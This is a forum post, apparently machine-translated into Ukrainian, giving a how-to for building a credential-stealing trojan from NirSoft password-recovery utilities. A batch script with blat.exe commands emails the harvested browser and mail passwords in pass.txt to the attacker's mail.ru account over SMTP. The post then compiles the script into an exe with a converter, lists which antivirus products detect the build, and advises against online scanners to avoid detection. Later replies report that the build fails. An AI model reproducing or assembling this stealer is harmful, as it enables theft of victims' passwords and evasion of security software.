Nirsoft remote password recovery - троян з підручних засобів - icq, proxy, Брута, Дедик, експлоїти

NirSoft Remote Password Recovery

Хо-хо)) А ось і я)
Всі вже чули про імпровізований троянець, створений за допомогою програми для локального відновлення паролів Multi Password Recovery.
Вона громіздка, детектується антивірусами, тягне багато зайвого і надсилає логи не в текстовому форматі, який іноді буває дуже потрібен.
І почав я шукати різні утиліти з схожим функціоналом, з підтримкою запуску з параметрами або роботи у фоновому режимі.
Їх багато, про всі рано чи пізно розповім, але зараз ми розглянемо набір програм від NirSoft:
  • ChromePass - відновлення паролів Google Chrome
  • iepv - для відновлення паролів IE
  • mailpv - для відновлення паролів популярних поштових програм (Outlook, Thunderbird та інші)
  • OperaPassView - для відновлення паролів Opera
  • PasswordFox - для відновлення паролів Firefox
Детальніше можна прочитати на оф.сайті nirsoft.net.

Нам знадобляться вище перераховані програми, якийсь батник, вміст якого буде вказано нижче і конвертер bat 2 exe converter. Все добро можна скачати в цьому архіві.
Дзеркало.

І так, відкриваємо start.bat:

blat.exe -install -server smtp.mail.ru -port 25 -f ЛОГІН @ mail.ru -u ЛОГІН -pw ПАРОЛЬ
blat.exe -to ЛОГІН @ mail.ru -subject "Тема Повідомлення" -attachi "pass.txt" -body "Тіло Повідомлення"

Тут все готово до роботи, необхідно всього лише замінити логін і пароль на свої, вказати свою тему повідомлення і текст в тексті листа.
Потім відкриваємо Bat_To_Exe_Converter.


У рядку Batch file вказуємо шлях до сорочки з короткими рукавами, ім'я вихідного файлу, ставимо галочки, як на скрині і переходимо в іншу вкладку - Include
Додаємо в список всі файли з папки Include


І натискаємо кнопку Compile.
Наш троян готовий. Вага вихідного файлу у мене вийшов близько 352 кб.
У збірку можна додавати та багато інших програм для відновлення даних з різних програм з сайту nirsoft.net.
Антивірусами це господарство палится, але поки не всіма. Якщо почнете лити на онлайн-Чеккер, то палится почне сильніше.

AVG Free - Trojan horse PSW.Generic8.BKAW.dropper
Avast - Win32: PSWtool-E [PUP]
F-Secure - Dropped: Application.NirSoft.ChromePassView
G Data - Dropped: Application.NirSoft.ChromePassView.C (Engine-A)
IKARUS Security - not-a-virus: PSWTool.Win32.NetPass
MS Security Essentials - HackTool: Win32 / Passview
Norman - W32 / Suspicious_Gen2.ERFKQ.dropper

Якщо звіти не приходять, то можливо варто змінити пошту або порт smtp.
Так само збірка детектується фаєрволла, проактівкамі і диспетчером задач)

Трохи поправимо. По-перше в коді батника помилка

По-друге антивірус (ESS) не хоче пропускати компіляцію трояна і після цього залишає від неї близько 21 кб, треба відключати.
По-третє не працює. Windows 7, антивирь і фаєрвол відключені, настройки в Bat to exe Оффтоп


(Останні 2 галочки поставив, думаючи що це врятує від того що вірус не працює)

UPD: Як не бийся, не працює. Ось скрін коду і сам файл: Оффтоп

Прихований текст (ви повинні увійти під своїм ім'ям або зареєструватися і мати 200 повідомлення (ий)):

У вас немає прав щоб бачити прихований текст, що міститься в цьому.